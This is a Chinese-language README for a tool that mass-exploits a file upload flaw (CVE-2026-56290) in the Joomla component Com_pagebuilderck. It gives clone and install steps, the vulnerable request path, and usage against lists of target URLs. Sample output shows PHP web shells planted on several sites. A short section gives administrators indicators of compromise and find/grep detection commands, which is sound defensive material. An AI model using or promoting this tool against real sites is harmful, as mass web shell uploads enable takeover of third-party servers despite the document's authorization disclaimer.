本工具仅供教育和授权安全测试使用。
- 未经授权访问计算机系统是违法的
- 请仅在你拥有或明确允许测试的系统上使用此工具
- 作者不对因使用本工具造成的任何误用或损害负责
- 使用本工具即表示你同意遵守所有适用法律和法规
更多免责声明可查看 Jenderal92 封面上的声明。你可点击 这里 !!! 查阅
CVE-2026-56290 是一个针对 Com_pagebuilderck Joomla 组件的批量利用工具。此漏洞允许远程攻击者通过无限制文件上传机制上传任意 PHP 文件,从而导致远程代码执行(RCE)。
| 属性 | 值 |
|---|---|
| CVE ID | CVE-2026-56290 |
| 组件 | Com_pagebuilderck |
| 平台 | Joomla! CMS |
| 类型 | 无限制文件上传(RCE) |
| CVSS 评分 | 9.8(严重) |
/media/com_pagebuilderck/gfonts/reslt.txtPython 2.7
pip(Python 包管理器)
Python 依赖
pip install requests colorama
🔧 安装
git clone https://github.com/Jenderal92/CVE-2026-56290.git
cd CVE-2026-56290
pip install -r requirements.txt
📖 使用方法
基本用法
python CVE-2026-56290.py targets.txt
输入文件格式
创建一个 targets.txt 文件,每行一个 URL:
https://example1.com
http://example2.com/joomla
https://example3.com:8080
# 注释行会被忽略
输出
· 控制台输出:实时进度与结果 · reslt.txt:包含所有存在漏洞的 shell URL
运行示例
$ python CVE-2026-56290.py targets.txt
[+] CVE-2026-56290 - Com_pagebuilderck 批量利用工具
[+] 线程数: 15
[+] 超时时间: 10s
[+] 输出文件: reslt.txt
[+] 从文件加载了 100 个目标
[*] 启动进程池,进程数 15...
[1] 加入队列: https://example1.com
[2] 加入队列: https://example2.com
...
[1] ✓✓✓ 存在漏洞: https://example1.com/media/com_pagebuilderck/gfonts/shell_abc123.php
⚙️ 配置
可修改脚本中的以下变量:
THREADS = 15 # 并发工作线程数
TIMEOUT = 10 # 请求超时时间(秒)
USER_AGENT = "..." # 自定义 User-Agent 字符串
OUTPUT_FILE = "reslt.txt" # 输出文件名
🛡️ 安全注意事项
对于系统管理员
如果你正在运行包含 Com_pagebuilderck 的 Joomla 站点:
/media/com_pagebuilderck/gfonts/ 目录中的可疑文件入侵指标(IoC)
查找以下利用迹象:
# 可疑文件位于
/media/com_pagebuilderck/gfonts/*.php
/media/com_pagebuilderck/gfonts/*.phtml
/media/com_pagebuilderck/gfonts/*.phar
# 可疑请求
/index.php?option=com_pagebuilderck&task=browse.ajaxAddPicture&[token]=1
检测命令
# 在 media 目录中查找可疑的 PHP 文件
find /path/to/joomla/media/com_pagebuilderck/gfonts/ -name "*.php" -type f
# 检查近期修改的文件
find /path/to/joomla/media/com_pagebuilderck/gfonts/ -type f -mtime -7
# 查找可疑文件名(随机字符串)
ls -la /path/to/joomla/media/com_pagebuilderck/gfonts/ | grep -E '[a-z0-9]{8,}\.(php|phtml|phar)'
⚠️ 法律声明
本软件按“原样”提供,不提供任何形式的担保。作者不对任何非法或不道德使用本工具的行为负责。在测试任何系统之前,请务必获得适当的授权。
🙏 致谢
· 发现并报告 CVE-2026-56290 的安全研究人员 · 维护 CMS 的 Joomla 社区
请记住:能力越大,责任越大。请以合乎道德且合法的方式使用本工具。